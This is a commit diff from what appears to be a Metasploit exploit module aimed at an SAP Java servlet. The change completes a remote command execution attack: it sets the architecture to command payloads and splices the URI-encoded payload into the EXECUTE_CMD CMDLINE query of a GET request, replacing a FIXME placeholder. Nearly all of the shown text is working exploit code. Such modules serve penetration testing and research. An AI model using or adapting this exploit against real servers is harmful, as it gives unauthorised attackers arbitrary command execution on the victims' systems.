basic payload execution through OS command execution
parent
223556a4e6
commit
7b6a784a84
|
@ -22,6 +22,7 @@ class Metasploit3 < Msf::Exploit
|
|||
],
|
||||
'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ]
|
||||
|
@ -46,7 +47,7 @@ class Metasploit3 < Msf::Exploit
|
|||
{
|
||||
'uri' => uri,
|
||||
'method' => 'GET',
|
||||
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' # FIXME payload processing here
|
||||
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(payload.encoded)
|
||||
})
|
||||
if !res or res.code != 200
|
||||
print_error("#{rhost}:#{rport} - Exploit failed.")
|
||||
|
|
Loading…
Reference in New Issue